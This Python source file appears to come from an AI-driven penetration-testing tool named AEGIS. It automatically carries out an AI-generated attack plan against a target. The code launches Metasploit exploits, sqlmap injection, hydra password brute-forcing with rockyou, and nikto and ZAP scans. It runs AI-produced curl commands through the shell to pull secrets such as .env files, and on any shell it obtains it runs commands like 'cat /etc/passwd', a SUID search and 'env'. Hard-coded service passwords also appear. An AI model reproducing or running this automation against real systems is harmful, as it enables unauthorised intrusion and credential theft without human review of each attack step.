"""
AEGIS core/attack_engine.py
=============================
Executes the attack plan generated by ai_engine.py.

FIXES APPLIED:
  1. _manual_instructions() now executes curl commands automatically
  2. _run_sqlmap() points at known vulnerable pages (not root URL)
  3. _run_sqlmap() adds DVWA authentication cookie
  4. AttackLog.objects.create() has null-safe module field
"""

import subprocess
import json
import os
import time
import hashlib
from datetime import datetime
from django.conf import settings


class AttackOrchestrator:
    """
    Receives an AI-generated attack plan and executes each step.
    Logs everything to DB and saves evidence for forensics.
    """

    def __init__(self, scan_result, attack_plan: dict):
        self.scan_result  = scan_result
        self.attack_plan  = attack_plan
        self.target       = attack_plan.get("target", scan_result.target)
        self.results      = []
        self.evidence_dir = f"evidence/{scan_result.id}"
        os.makedirs(self.evidence_dir, exist_ok=True)

    def execute(self) -> dict:
        sequence = self.attack_plan.get("attack_sequence", [])

        if not sequence:
            return {
                "status":  "NO_ATTACKS",
                "message": "AI found no exploitable vulnerabilities",
                "results": []
            }

        sequence = sorted(sequence, key=lambda x: x.get("priority", 99))

        for attack in sequence:
            tool   = attack.get("tool", "manual").lower()
            result = self._execute_single_attack(attack, tool)
            self.results.append(result)

            if result.get("success") and result.get("shell"):
                post = self._post_exploitation(result["shell"])
                result["post_exploitation"] = post

        return {
            "status":      "COMPLETE",
            "target":      self.target,
            "attacks_run": len(self.results),
            "successful":  sum(1 for r in self.results if r.get("success")),
            "results":     self.results,
            "evidence_dir": self.evidence_dir,
            "timestamp":   datetime.now().isoformat()
        }

    def _execute_single_attack(self, attack: dict, tool: str) -> dict:
        from scanner_ui.models import AttackLog

        # FIX: null-safe module field
        log = AttackLog.objects.create(
            scan        = self.scan_result,
            tool_used   = tool,
            module      = attack.get("module") or attack.get("command") or "unknown",
            target_port = attack.get("port"),
            status      = "RUNNING"
        )

        try:
            if tool == "metasploit":
                result = self._run_metasploit(attack)
            elif tool == "sqlmap":
                result = self._run_sqlmap(attack)
            elif tool == "hydra":
                result = self._run_hydra(attack)
            elif tool == "nikto":
                result = self._run_nikto(attack)
            elif tool == "zap":
                result = self._run_zap(attack)
            else:
                result = self._manual_instructions(attack)

            log.status     = "SUCCESS" if result.get("success") else "FAILED"
            log.output     = result.get("output", "")[:5000]
            log.session_id = result.get("session_id", "")
            log.save()

            result["vulnerability"] = attack.get("vulnerability", "")
            result["tool"]          = tool
            result["port"]          = attack.get("port")

            self._save_evidence(result, attack)
            return result

        except Exception as e:
            log.status = "ERROR"
            log.output = str(e)
            log.save()
            return {
                "success": False,
                "tool":    tool,
                "error":   str(e),
                "output":  f"Attack execution error: {str(e)}"
            }

    # ─────────────────────────────────────────────────────────────────────────
    # METASPLOIT
    # ─────────────────────────────────────────────────────────────────────────

    def _run_metasploit(self, attack: dict) -> dict:
        module  = attack.get("module", "")
        options = attack.get("options", {})
        # Normalise RHOST → RHOSTS (AI sometimes uses wrong option name)
        if "RHOST" in options and "RHOSTS" not in options:
            options["RHOSTS"] = options.pop("RHOST")
        payload = attack.get("payload", "")

        # BETTER — trust the AI's options, fall back cleanly
        if "RHOSTS" not in options:
            options["RHOSTS"] = self.target
        if "RPORT" not in options and attack.get("port"):
            options["RPORT"] = str(attack.get("port"))

        try:
            from pymetasploit3.msfrpc import MsfRpcClient

            msf_host = getattr(settings, 'METASPLOIT_HOST', 'localhost')
            msf_port = int(getattr(settings, 'METASPLOIT_PORT', 55553))
            msf_pass = getattr(settings, 'METASPLOIT_PASS', 'aegis123')

            client  = MsfRpcClient(msf_pass, server=msf_host, port=msf_port, ssl=False)
            exploit = client.modules.use('exploit', module)

            for key, value in options.items():
                exploit[key] = value

            if payload:
                exploit['PAYLOAD'] = payload

            job = exploit.execute(payload=payload if payload else None)
            if not isinstance(job, dict):
                return {
                    "success": False,
                    "output":  f"Module failed to execute. Module: {module}",
                    "module":  module
                }
            job_id = job.get('job_id')

            for _ in range(30):
                time.sleep(1)
                sessions = client.sessions.list
                if sessions:
                    session_id = list(sessions.keys())[-1]
                    session    = client.sessions.session(session_id)
                    session.write("id\n")
                    time.sleep(1)
                    output = session.read()
                    return {
                        "success":    True,
                        "output":     f"Shell obtained!\n{output}",
                        "session_id": str(session_id),
                        "shell":      session,
                        "module":     module
                    }

            return {
                "success": False,
                "output":  f"Module executed but no session created. Job ID: {job_id}",
                "module":  module
            }

        except ConnectionRefusedError:
            return {
                "success": False,
                "output":  (
                    "[METASPLOIT NOT RUNNING]\n"
                    "Start with: msfconsole -q -x \"load msgrpc Pass=aegis123 ServerPort=55553 SSL=false\"\n"
                    f"Module that would run: {module}\n"
                    f"Options: {json.dumps(options, indent=2)}"
                ),
                "module": module
            }
        except Exception as e:
            return {
                "success": False,
                "output":  f"Metasploit error: {str(e)}\nModule: {module}",
                "module":  module
            }

    # ─────────────────────────────────────────────────────────────────────────
    # SQLMAP — FIX: target known vulnerable pages, add auth cookie
    # ─────────────────────────────────────────────────────────────────────────

    def _run_sqlmap(self, attack: dict) -> dict:
        port    = attack.get("port", 80)
        options = attack.get("options", {})
        scheme  = "https" if port == 443 else "http"

        # Trust the AI's URL if it provided one, otherwise start from root
        # and let sqlmap crawl to find injectable pages itself
        url = (options.get("url")
            or options.get("target_url")
            or f"{scheme}://{self.target}:{port}/")

        output_dir = f"{self.evidence_dir}/sqlmap"
        os.makedirs(output_dir, exist_ok=True)

        # Build cookie string from AI options if provided
        cookie = options.get("cookie", "")

        try:
            cmd = [
                "sqlmap",
                "-u", url,
                "--batch",
                "--level", "3",
                "--risk", "2",
                "--dbs",
                "--output-dir", output_dir,
                "--timeout", "30",
                "--forms",           # discover forms automatically
                "--crawl", "3",      # crawl 3 levels to find injection points
                "--random-agent",    # vary user agent
            ]

            if cookie:
                cmd += ["--cookie", cookie]

            result = subprocess.run(cmd, capture_output=True, text=True, timeout=180)
            output  = result.stdout + result.stderr
            success = ("injectable" in output.lower()
                    or "sqlmap identified" in output.lower()
                    or "parameter" in output.lower() and "is vulnerable" in output.lower())

            return {"success": success, "output": output[:3000], "url": url, "tool": "sqlmap"}

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] sqlmap not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] SQLMap exceeded 3 minutes"}
        except Exception as e:
            return {"success": False, "output": f"SQLMap error: {str(e)}"}
    # ─────────────────────────────────────────────────────────────────────────
    # HYDRA
    # ─────────────────────────────────────────────────────────────────────────

    def _run_hydra(self, attack: dict) -> dict:
        port    = attack.get("port", 22)
        service = attack.get("service", "ssh").lower()
        options = attack.get("options", {})

        userlist = "/usr/share/wordlists/metasploit/unix_users.txt"
        passlist = "/usr/share/wordlists/rockyou.txt"

        if not os.path.exists(userlist):
            userlist = f"{self.evidence_dir}/users.txt"
            with open(userlist, "w") as f:
                f.write("admin\nroot\nuser\ntest\nguest\nwww-data\n")

        if not os.path.exists(passlist):
            passlist = f"{self.evidence_dir}/passwords.txt"
            with open(passlist, "w") as f:
                f.write("admin\npassword\n123456\nroot\ntoor\npassword123\nadmin123\n")

        try:
            protocol_map = {
                "ssh": "ssh", "ftp": "ftp",
                "http": "http-get", "https": "https-get",
                "smtp": "smtp", "mysql": "mysql",
            }
            protocol = protocol_map.get(service, service)

            cmd = [
                "hydra",
                "-L", userlist,
                "-P", passlist,
                "-t", "4",
                "-f",
                "-V",
                self.target,
                protocol,
                "-s", str(port),
            ]

            result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
            output  = result.stdout + result.stderr
            success = "login:" in output.lower() and "password:" in output.lower()
            creds   = [l.strip() for l in output.splitlines()
                       if "login:" in l.lower() and "password:" in l.lower()]

            return {
                "success":     success,
                "output":      output[:3000],
                "credentials": creds,
                "service":     service,
                "port":        port
            }

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] hydra not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Hydra exceeded 2 minutes"}
        except Exception as e:
            return {"success": False, "output": f"Hydra error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # NIKTO
    # ─────────────────────────────────────────────────────────────────────────

    def _run_nikto(self, attack: dict) -> dict:
        port        = attack.get("port", 80)
        scheme      = "https" if port == 443 else "http"
        url         = f"{scheme}://{self.target}:{port}"
        output_file = f"{self.evidence_dir}/nikto_{port}.txt"

        try:
            cmd = [
                "nikto", "-h", url,
                "-o", output_file,
                "-Format", "txt",
                "-timeout", "10",
                "-maxtime", "120s",
            ]
            result  = subprocess.run(cmd, capture_output=True, text=True, timeout=150)
            output  = result.stdout + result.stderr
            success = "osvdb" in output.lower() or "+" in output

            return {"success": success, "output": output[:3000],
                    "output_file": output_file, "url": url}

        except FileNotFoundError:
            return {"success": False, "output": "[ERROR] nikto not installed"}
        except subprocess.TimeoutExpired:
            return {"success": False, "output": "[TIMEOUT] Nikto exceeded time limit"}
        except Exception as e:
            return {"success": False, "output": f"Nikto error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # ZAP
    # ─────────────────────────────────────────────────────────────────────────

    def _run_zap(self, attack: dict) -> dict:
        import requests as req

        port   = attack.get("port", 80)
        scheme = "https" if port == 443 else "http"
        url    = f"{scheme}://{self.target}:{port}"
        ZAP_API = "http://localhost:8090"
        ZAP_KEY = "aegis_zap_key"

        try:
            resp    = req.get(f"{ZAP_API}/JSON/ascan/action/scan/",
                              params={"url": url, "apikey": ZAP_KEY}, timeout=10)
            scan_id = resp.json().get("scan")

            for _ in range(60):
                time.sleep(3)
                status = req.get(f"{ZAP_API}/JSON/ascan/view/status/",
                                 params={"scanId": scan_id, "apikey": ZAP_KEY},
                                 timeout=5).json().get("status", "0")
                if status == "100":
                    break

            alerts      = req.get(f"{ZAP_API}/JSON/alert/view/alerts/",
                                  params={"baseurl": url, "apikey": ZAP_KEY},
                                  timeout=10).json().get("alerts", [])
            high_alerts = [a for a in alerts if a.get("risk") in ["High", "Critical"]]
            output      = "\n".join(
                f"[{a.get('risk')}] {a.get('alert')} — {a.get('url')}"
                for a in alerts[:20]
            )

            return {
                "success": len(high_alerts) > 0,
                "output":  output or "No alerts found",
                "alerts":  len(alerts),
                "high":    len(high_alerts)
            }

        except req.exceptions.ConnectionError:
            return {"success": False,
                    "output": "[ZAP NOT RUNNING] ZAP daemon not reachable at localhost:8090"}
        except Exception as e:
            return {"success": False, "output": f"ZAP error: {str(e)}"}

    # ─────────────────────────────────────────────────────────────────────────
    # MANUAL — FIX: now executes curl commands automatically
    # ─────────────────────────────────────────────────────────────────────────

    def _manual_instructions(self, attack: dict) -> dict:
        command = attack.get("command", "")

        # Execute curl commands automatically but safely
        if command and command.strip().startswith("curl"):
            import re

            # Save output to evidence folder — prevents overwriting project files
            # (AI sometimes generates: curl http://target/.env -o .env which would
            #  overwrite your actual .env file)
            safe_output_path = f"{self.evidence_dir}/curl_output_{attack.get('port', 0)}.txt"
            os.makedirs(self.evidence_dir, exist_ok=True)

            # Replace any -o <filename> with our safe path
            safe_command = re.sub(r'-o\s+\S+', f'-o {safe_output_path}', command)
            # If no -o flag exists, add one
            if ' -o ' not in safe_command and ' -O' not in safe_command:
                safe_command = command + f' -o {safe_output_path}'

            try:
                result = subprocess.run(
                    safe_command,
                    shell=True,
                    capture_output=True,
                    text=True,
                    timeout=30
                )

                # Read the saved file for content analysis
                output = ""
                if os.path.exists(safe_output_path):
                    with open(safe_output_path, 'r', errors='ignore') as f:
                        output = f.read(2000)
                if not output:
                    output = result.stdout[:2000] or result.stderr[:500]

                # Only count as success if actual sensitive content found
                sensitive_keywords = [
                    'api_key', 'api_secret', 'password', 'passwd', 'secret',
                    'token', 'database', 'db_pass', 'db_user', 'aws_',
                    'private_key', 'auth_key', 'access_key', 'smtp_',
                    'key=', 'pass=', 'secret=', 'token='
                ]
                success = (
                    result.returncode == 0
                    and len(output) > 50
                    and any(kw in output.lower() for kw in sensitive_keywords)
                )

                return {
                    "success": success,
                    "output":  f"[EXECUTED]\nCommand: {command}\n\n{output}",
                    "tool":    "manual",
                    "command": safe_command,
                    "evidence_file": safe_output_path
                }

            except subprocess.TimeoutExpired:
                return {
                    "success": False,
                    "output":  "[TIMEOUT] curl command exceeded 30 seconds",
                    "tool":    "manual"
                }
            except Exception as e:
                pass  # Fall through to instructions

        # For non-curl manual attacks — return instructions
        return {
            "success": None,
            "output": (
                f"[MANUAL TESTING REQUIRED]\n\n"
                f"Vulnerability: {attack.get('vulnerability', 'Unknown')}\n"
                f"Port: {attack.get('port', 'N/A')}\n\n"
                f"Command to run:\n{command}\n\n"
                f"Expected: {attack.get('expected_outcome', 'Unknown')}\n\n"
                f"Fallback: {attack.get('fallback', 'N/A')}"
            ),
            "tool": "manual"
        }

    # ─────────────────────────────────────────────────────────────────────────
    # POST-EXPLOITATION
    # ─────────────────────────────────────────────────────────────────────────

    def _post_exploitation(self, session) -> list:
        commands = [
            "id", "whoami", "uname -a",
            "cat /etc/passwd", "sudo -l",
            "find / -perm -4000 2>/dev/null | head -20",
            "ifconfig || ip a",
            "netstat -tulpn 2>/dev/null || ss -tulpn",
            "ps aux | head -20", "env",
        ]
        results = []
        try:
            for cmd in commands:
                session.write(cmd + "\n")
                time.sleep(0.5)
                output = session.read()
                results.append({"command": cmd, "output": output})
                self._append_evidence("post_exploitation.txt",
                                      f"$ {cmd}\n{output}\n\n")
        except Exception as e:
            results.append({"command": "error", "output": str(e)})
        return results

    # ─────────────────────────────────────────────────────────────────────────
    # EVIDENCE
    # ─────────────────────────────────────────────────────────────────────────

    def _save_evidence(self, result: dict, attack: dict):
        from scanner_ui.models import ForensicEvidence

        # Strip non-serialisable objects (e.g. Metasploit session handle)
        safe_result = {k: v for k, v in result.items() if k != "shell"}

        content = json.dumps({
            "timestamp":     datetime.now().isoformat(),
            "target":        self.target,
            "vulnerability": attack.get("vulnerability", ""),
            "tool":          attack.get("tool", ""),
            "module":        attack.get("module", ""),
            "result":        safe_result
        }, indent=2)

        filename = (f"{self.evidence_dir}/attack_"
                    f"{attack.get('tool','unknown')}_{attack.get('port',0)}.json")
        with open(filename, "w") as f:
            f.write(content)

        sha256 = hashlib.sha256(content.encode()).hexdigest()

        ForensicEvidence.objects.create(
            scan          = self.scan_result,
            evidence_type = "LOG",
            file_path     = filename,
            sha256_hash   = sha256,
            description   = (
                f"{attack.get('tool','')} on port {attack.get('port','')} — "
                f"{'SUCCESS' if result.get('success') else 'FAILED'}"
            )
        )

    def _append_evidence(self, filename: str, content: str):
        path = f"{self.evidence_dir}/{filename}"
        with open(path, "a") as f:
            f.write(content)


# ─────────────────────────────────────────────────────────────────────────────
# PIPELINE HELPER (called from tasks.py)
# ─────────────────────────────────────────────────────────────────────────────

def run_attack_pipeline(scan_result_id: int) -> dict:
    from scanner_ui.models import ScanResult
    from core.ai_engine import generate_attack_plan

    try:
        scan         = ScanResult.objects.get(id=scan_result_id)
        attack_plan  = generate_attack_plan(scan.raw_data, scan.target)
        orchestrator = AttackOrchestrator(scan, attack_plan)
        results      = orchestrator.execute()

        raw_data                   = dict(scan.raw_data)
        raw_data["attack_plan"]    = attack_plan
        raw_data["attack_results"] = results
        scan.raw_data              = raw_data
        scan.save()

        return {"status": "COMPLETE", "scan_id": scan_result_id,
                "attack_plan": attack_plan, "results": results}

    except ScanResult.DoesNotExist:
        return {"status": "ERROR", "message": f"Scan {scan_result_id} not found"}
    except Exception as e:
        return {"status": "ERROR", "message": str(e)}